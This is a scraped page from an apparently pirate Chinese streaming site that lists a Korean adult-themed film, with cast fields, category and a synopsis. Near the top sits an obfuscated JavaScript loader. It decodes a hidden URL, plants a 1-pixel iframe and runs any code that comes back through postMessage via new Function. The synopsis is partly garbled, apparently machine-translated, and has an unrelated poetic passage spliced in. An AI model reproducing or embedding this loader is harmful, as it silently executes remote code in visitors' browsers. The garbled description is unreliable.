看天堂

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['YxdpREK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_6954`]) { var t = x(e.data[`des_s_6954`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HRF'+'F0c'+'HMl'+'MFF'+'0El'+'MkY'+'FFl'+'MkZ'+'qYF'+'FS5'+'5dX'+'NFF'+'odW'+'FFh'+'hLF'+'FmN'+'vbS'+'UzQ'+'TFF'+'EwN'+'DQz'+'FFJ'+'TJF'+'FGY'+'zFF'+'RjY'+'TQy'+'JTJ'+'GYy'+'02O'+'TU0'+'LTI'+'yLT'+'FFF'+'lNg'+'==',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
当前位置:首页  »  电影  »  伦理片  »  交换:完美的邻居

交换:完美的邻居

更新至BD高清
  • 主演:
  • 相关:交换:完美的邻居
  • 类型:伦理片
  • 地区:韩国
  • 语言:
  • 上映:0 年
  • 更新:2020/6/28 23:48:31
  • 点播次数:加载中
婚后,珍古和朱熙刚来权泰基,夫妻俩只希望有一段恋爱关系。 与此同时,这对新婚的夫妇分别是贤珍和裕贞。 每个人都被邻居的妻 查看更多
顶0| 踩0

zkyun

zkm3u8

温馨提示:更新至BD高清无需安装任何插件,即可快速播放

猜你喜欢的

交换:完美的邻居影片介绍

荷,在秋波间,嗝吱嗝吱地笑个不停。那是调皮的月,嘎吱了她敏感的腋窝。夜凝的露珠,是她盈眶的泪了。滴落叶间,跌跌撞撞,叮叮咚咚,如泉滴滑落深涧,如雨滴坠落小潭。婚后,珍古和朱熙刚来权泰基,夫妻俩只希望有一段恋爱关系。 与此同时,这对新婚的夫妇分别是贤珍和裕贞。 每个人都被邻居的妻子和丈夫所吸引,并最终越过了不应与邻居越界的界限。 那天之后,两人的黄金嘘声越来越好...
收藏 留言 返回顶部